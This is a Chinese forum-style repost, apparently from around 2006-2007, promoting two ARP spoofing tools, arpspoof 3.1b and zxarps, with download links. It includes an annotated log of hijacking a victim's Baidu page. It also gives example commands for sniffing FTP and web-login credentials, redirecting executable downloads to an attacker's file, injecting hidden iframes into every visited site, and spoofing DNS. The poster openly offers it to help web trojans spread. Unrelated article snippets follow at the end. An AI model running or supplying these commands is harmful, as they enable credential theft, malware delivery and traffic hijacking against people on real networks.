最近幻影的两个ARP欺骗工具 挺不错的

 arpspoof 3.1b

主要功能:ARP欺骗过程中进行数据修改,实现会话劫持攻击
说明: 本程序公开源代码,为了换取更多朋友的指教

实例: 欺骗192.168.0.108访问百度网站的全过程(注:#后是我加的注释)
效果: 192.168.0.108看到的百度首页只有一句话“Hack by cooldiyer”,攻击成功。
图解:
__________________________________________________________________________________
F:/arpspoof/Release>arpspoof /n
ARPSpoof 3.1b by CoolDiyer 06-10-30
[+] Replace Job file job.txt release success... # 利用程序自动生成的规则文件,就能搞定

F:/arpspoof/Release>arpspoof 192.168.0.1 192.168.0.108 80 2 1 /r job.txt
ARPSpoof 3.1b by CoolDiyer 06-10-30
[*] Parsing rul <hea ==> Hack by cooldiyer<noframes> # 程序加载文件job.txt中的规则,可用arpspoof /n生成模板
[*] Parsing rul <HEA ==> Hack by cooldiyer<noframes>
[+] Loaded 2 rules... # 共加载了两条规则,如果文件格式不对,程序在这里会中断
[*] Spoofing 192.168.0.1 <-> 192.168.0.108 # 开始arpspoof欺骗,监视转发的数据包
[+] Caught 192.168.0.108:4304 -> 202.108.22.43:80 # 程序捕捉到了一个需要转发的数据包,但没找到要替换的字符串
[*] Forwarding untouched packet of size 62 # 所以直接转发出去,以下几个也是
[+] Caught 202.108.22.43:80 -> 192.168.0.108:4304 # ............
[*] Forwarding untouched packet of size 62
[+] Caught 192.168.0.108:4304 -> 202.108.22.43:80
[*] Forwarding untouched packet of size 60
[+] Caught 192.168.0.108:4304 -> 202.108.22.43:80
[*] Forwarding untouched packet of size 399
[+] Caught 202.108.22.43:80 -> 192.168.0.108:4304
[*] Forwarding untouched packet of size 60
[+] Caught 202.108.22.43:80 -> 192.168.0.108:4304 # 程序捕捉到了一个需要转发的数据包,找到了要替换的内容,应用规则。
Applying rul <hea ==> Hack by cooldiyer<noframes> # 把“<hea”替换成了“Hack by cooldiyer<noframes>”
[*] Done 1 replacements, forwarding packet of size 1474 # 给出提示这个数据包被替换了多少次,替换后包的大小 (调试用的)
[+] Caught 202.108.22.43:80 -> 192.168.0.108:4304
[*] Forwarding untouched packet of size 1474
[+] Caught 192.168.0.108:4304 -> 202.108.22.43:80
[*] Forwarding untouched packet of size 60
[+] Caught 202.108.22.43:80 -> 192.168.0.108:4304
[*] Forwarding untouched packet of size 237
[+] Caught 192.168.0.108:4304 -> 202.108.22.43:80
[*] Forwarding untouched packet of size 60
[+] Reseting ..... # Ctrl+C,程序自动恢复受骗主机的ARP缓存
[-] Sleep 5s ............ # 5秒退出
__________________________________________________________________________________

其它说明:
arpspoof 192.168.0.1 192.168.0.108 80 2 1 /s sniff.log
可保存数据到文件,
arpspoof 192.168.0.1 192.168.0.108 80 2 1
只显示数据
被替换的字符串要尽可能的短,这样能减少程序负担,可参考arpspoof /n生成的规则文件job.txt
需要说的是程序在公网下照样使用,我已经解说过了,不再举例.........
规则文件的使用可以看程序的书写,本程序开放源代码
希望测试出更多Bug, 我努力更新。。
By CoolDiyer 2006-11-12

下载:http://allyesno.gbaopan.com/files/127df7d9d1ee441d9994959af8e24c21.gbp

zxarps

在当今网马横飞的日子,我帖个东东,让网马飞得更猛烈些吧

说明:
需要winPcap
基于arp欺骗,
具体功能看下面的使用说明~~~懒得打太多字了~~~

一些注意:
通常欺骗都是针对 网关和同网段下的其他机,所以-sethost [ip] 参数可以不填,
但如果同网段下有某server,而你想嗅探其他用户到该server的数据就要-sethost serverIP

Codz:

       

0. Realtek RTL8139

    IP Address
. . . . . : 192.168.1.101

    Physical Address
. . : 00-11-D8-6B-5E-19

    
Default Gateway . . : 192.168.1.1



1. WAN
(PPP/SLIP) Interface

    IP Address
. . . . . : xx.xx.xx.xx

    Physical Address
. . : 00-52-00-00-00-00

    
Default Gateway . . : xx.xx.xx.xx

options
:

    -
idx [index]       网卡索引号

    
-ip [ip]           欺骗的IP,'-'指定范围,','隔开

    
-sethost [ip]      默认是网关,可以指定别的IP

    
-port [port]       关注的端口,'-'指定范围,','隔开,没指定默认关注所有端口

    
-reset             恢复目标机的ARP表

    
-hostname          探测主机时获取主机名信息

    
-logfilter [string]设置保存数据的条件,必须+-_做前缀,后跟关键字,

                       
','隔开关键字,多个条件'|'隔开

                       所有带
+前缀的关键字都出现的包则写入文件

                       带
-前缀的关键字出现的包不写入文件

                       带_前缀的关键字一个符合则写入文件
(如有+-条件也要符合)

    -
save_a [filename] 将捕捉到的数据写入文件 ACSII模式

    
-save_h [filename] HEX模式



    
-hacksite [ip]     指定要插入代码的站点域名或IP,

                       
多个可用','隔开,没指定则影响所有站点

    
-insert [html code]指定要插入html代码



    
-postfix [string]  关注的后缀名,只关注HTTP/1.1 302

    
-hackURL [url]     发现关注的后缀名后修改URL到新的URL

    
-filename [name]   新URL上有效的资源文件名



    
-hackdns [string]  DNS欺骗,只修改UDP的报文,多个可用','隔开

                       格式
: 域名|IP,www.aa.com|222.22.2.2,www.bb.com|1.1.1.1



    
-Interval [ms]     定时欺骗的时间间隔,单位:毫秒:默认是3000 ms

    
-spoofmode [1|2|3] 将数据骗发到本机,欺骗对象:1为网关,2为目标机,3为两者(默认)

    -
speed [kb]        限制指定的IP或IP段的网络总带宽,单位:KB



example
:

    
嗅探指定的IP段中端口80的数据,并以HEX模式写入文件

    zxarps
.exe -idx 0 -ip 192.168.0.2-192.168.0.50 -port 80 -save_h sniff.log



    FTP嗅探
,在21或2121端口中出现USER或PASS的数据包记录到文件

    zxarps
.exe -idx 0 -ip 192.168.0.2 -port 21,2121 -spoofmode 2 -logfilter "_USER ,_PASS" -save_a sniff.log



    HTTP web邮箱登陆或一些论坛登陆的嗅探
,根据情况自行改关键字

    zxarps
.exe -idx 0 -ip 192.168.0.2-192.168.0.50 -port 80 -logfilter "+POST ,+user,+pass" -save_a sniff.log



    用
|添加嗅探条件,这样FTP和HTTP的一些敏感关键字可以一起嗅探

    zxarps
.exe -idx 0 -ip 192.168.0.2 -port 80,21 -logfilter "+POST ,+user,+pass|_USER ,_PASS" -save_a sniff.log



    如果嗅探到目标下载文件后缀是exe等则更改Location
:为http://xx.net/test.exe

    
zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.12,192.168.0.20-192.168.0.30 -spoofmode 3 -postfix ".exe,.rar,.zip" -hackurl http://xx.net/ -filename test.exe



    
指定的IP段中的用户访问到-hacksite中的网址则只显示just for fun

    zxarps
.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -hacksite 222.2.2.2,www.a.com,www.b.com -insert "just for fun<noframes>"



    
指定的IP段中的用户访问的所有网站都插入一个框架代码

    zxarps
.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -insert "<iframe src='xx' width=0 height=0>"



    
指定的两个IP的总带宽限制到20KB

    zxarps
.exe -idx 0 -ip 192.168.0.55,192.168.0.66 -speed 20



    DNS欺骗

    zxarps
.exe -idx 0 -ip 192.168.0.55,192.168.0.66 -hackdns "www.aa.com|222.22.2.2,www.bb.com|1.1.1.1"



zxarps Build 01/19/2007 By LZX.

 

下载:http://allyesno.gbaopan.com/files/caef438cb81649dda7da376e515be0b7.gbp

           

再分享一下我老师大神的人工智能教程吧。零基础!通俗易懂!风趣幽默!还带黄段子!希望你也加入到我们人工智能的队伍中来!https://blog.csdn.net/jiangjunshow

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/427423.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

python中math库最大值_python-math库解析

math库的数学常数&#xff08;共4个&#xff09; math.pi 表示Π&#xff0c;圆周率&#xff0c;值为3.141592653589…… math.e 表示e&#xff0c;自然对数&#xff0c;值为2.718…… math.inf 表示正无穷大&#xff0c;负无穷大为-math.inf math.nan 表示非浮点数标记 math库…

idea启动项目没错,可是debug却一直启动不起来

原因很简单&#xff1a; 断电打的太多了导致的&#xff0c;去掉不需要的断点之后就好了&#xff01; 转载于:https://www.cnblogs.com/sllcom/p/9327908.html

一个牛人的经历---北京八年——从极度贫困到财务自由

一个牛人的经历---北京八年——从极度贫困到财务自由 第一章&#xff1a; 八年巨变 我1996年7月从东北的一所曾经非常有名的工科大学毕业&#xff0c;快毕业时听了一位同乡校 友姐姐的话“宁到好地方&#xff0c;不到好单位”&#xff0c;经过一番各式各样的努力&#xff0c;96…

python绘制不带颜色曲线图_Python画曲线图

画图方法 from matplotlib import font_manager import numpy as np import matplotlib . pyplot as plt zh_fontfont_manager . FontProperties ( fnamerc:\windows\fonts\simsun.ttc , size14 ) # create a arr x1[ x * 0.5 for x in range( 1 , 20 )] y1x1 # create a arr x…

【数学建模】day02-整数规划

基本类似于中学讲的整数规划--线性规划中变量约束为整数的情形。 目前通用的解法适合整数线性规划。不管是完全整数规划(变量全部约束为整数)&#xff0c;还是混合整数规划(变量既有整数又有实数)&#xff0c;MATLAB都提供了通用的求解函数。 一、0-1型整数规划 这类规划将变量…

那年的夏天很笛子

原文&#xff1a;salance-moon.spaces.live.com在某个阶段&#xff0c;我想应该是时候把至今为止影响自己走上美工&设计&程序之路的历程整理一下了。但是下笔的时候才发现&#xff0c;其实这几乎成了我童年的回忆录&#xff0c;因为程序暂且不算&#xff0c;美工&设…

python数据的格式输出_python

本文主要由Python String Format 一文翻译整理而来&#xff0c;在python中使用 % 进行格式化字符串由来已久&#xff0c;不过在python2.7 的版本中引入了新的格式化字符串的方法。虽然%号的方式依旧可用&#xff0c;不过在[PEP-3101] 中已有含蓄的警告称将完全淘汰python2.6之前…

[kafka]kafka集群实践

环境 iphostnameserver_id192.168.1.111UAT042192.168.1.112UAT031192.168.1.102UAT053配置hosts: 192.168.1.112 UAT03 192.168.1.111 UAT04 192.168.1.102 UAT05 安装jdk # rpm -ivh jdk-8u65-linux-x64.rpm # java -version java version "1.8.0_65" Java(TM) SE …

互联网盈利模式77种创新 【 很八股的标题,不过内容还是可以参考一下的 】

http://it.icxo.com/htmlnews/2006/05/26/854682.htm当整个世界都在为互联网喝彩的时候&#xff0c;人们心中往往都会进行这样的思考--我怎样才能在互联网上获得财富&#xff1f;其实&#xff0c;这个问题是没有人能够回答的&#xff0c;因为可以回答的人正在为获得财富忙得不可…

.gitignore文件_Java小白入门,Git忽略文件.gitignore详解

在工程中&#xff0c;并不是所有文件都需要保存到版本库中的&#xff0c;例如“target”目录及目录下的文件就可以忽略。在Git工作区的根目录下创建一个特殊的.gitignore文件&#xff0c;然后把要忽略的文件名填进去&#xff0c;Git就会自动忽略这些文件或目录。Git 忽略规则优…

Xamarin Essentials教程磁力计Magnetometer

Xamarin Essentials教程磁力计Magnetometer磁力计也叫地磁、磁感器&#xff0c;可用于测试磁场强度和方向。在手持设备中&#xff0c;通过磁力计可以计算设备的左右、前后倾斜角度&#xff0c;广泛应用于手机各种的应用中。在Xamarin中&#xff0c;开发者可以使用Xamarin.Essen…

python 字符串截取_Python 字符串操作实现代码(截取/替换/查找/分割)

Python 截取字符串使用 变量[头下标:尾下标]&#xff0c;就可以截取相应的字符串&#xff0c;其中下标是从0开始算起&#xff0c;可以是正数或负数&#xff0c;下标可以为空表示取到头或尾。 # 例1&#xff1a;字符串截取 str 12345678 print str[0:1] >> 1 # 输出str位…

VMware的linux虚拟机实现和windows的文件共享

使用的centos7和windows10&#xff0c;在虚拟机centos7中是root身份。由于是第一次用没有界面的linux&#xff0c;可谓是困难重重…… 一 打开VMware&#xff0c;然后选中你的虚拟机&#xff0c;我的是centos7。然后点击工具栏”虚拟机“&#xff0c;然后选择”安装VMware tool…

XYZ DOWN-电子书

分享一下我老师大神的人工智能教程。零基础&#xff01;通俗易懂&#xff01;风趣幽默&#xff01;还带黄段子&#xff01;希望你也加入到我们人工智能的队伍中来&#xff01;https://blog.csdn.net/jiangjunshowC Primer 中文第三版 http://dl5.mydown.com/test/ziliao/at2004…

通汇手机为何卖得那么红火

分享一下我老师大神的人工智能教程。零基础&#xff01;通俗易懂&#xff01;风趣幽默&#xff01;还带黄段子&#xff01;希望你也加入到我们人工智能的队伍中来&#xff01;https://blog.csdn.net/jiangjunshow通汇手机连锁去年销量又高居粤西地区榜首通汇手机为何卖得那么红…

OpenCV+3计算机视觉++Python语言实现+第二版pdf

下载地址&#xff1a;网盘下载 OpenCV 3是一种先进的计算机视觉库&#xff0c;可以用于各种图像和视频处理操作&#xff0c;通过OpenCV 3 能很容易地实现一些有前景且功能先进的应用&#xff08;比如&#xff1a;人脸识别或目标跟踪等&#xff09;。理解与计算机视觉相关的算法…

javascript进制转换_「js基础」JavaScript逻辑和位运算符归纳

上一篇文章呢&#xff0c;我们讲述了JavaScript运算符中的关系运算符和逻辑运算符&#xff0c;那么紧接上一篇的文章我们今天来说说逻辑运算符。引言逻辑运算符不是很难&#xff0c;也不是很多&#xff0c;我们只要记住三个就可以啦&#xff01;分别是&#xff1a;&#xff01;…

〖强暴贴〗号称全国最大开发者网络的CSDN多次出现低级错误 验证码形同虚设 开发人员竟是MVP

分享一下我老师大神的人工智能教程。零基础&#xff01;通俗易懂&#xff01;风趣幽默&#xff01;还带黄段子&#xff01;希望你也加入到我们人工智能的队伍中来&#xff01;https://blog.csdn.net/jiangjunshow主  题&#xff1a;【醒目】〖强暴贴〗号称全国最大开发者网络…

MySQL系统自带的数据库information schema

转自&#xff1a;https://www.cnblogs.com/shengdimaya/p/6920677.html#commentform information_schema数据库是MySQL系统自带的数据库&#xff0c;它提供了数据库元数据的访问方式。感觉information_schema就像是MySQL实例的一个百科全书&#xff0c;记录了数据库当中大部分我…

micropython oled中文_micropython中怎么将gb2312编码的字节流变成中文

展开全部 # -*- code: utf-8 -*- # 在 micropython 中运行, 注意在运行目录下有 hzk12/16 # 啊 是汉字区第1个汉字&#xff0c;62616964757a686964616fe59b9ee7ad9431333431353932对应数据为 ?不对&#xff1f; # 0x00, 0x00, 0x0E, 0xFC, 0xEA, 0x08, 0xAA, 0x08, # 0xAA, 0x…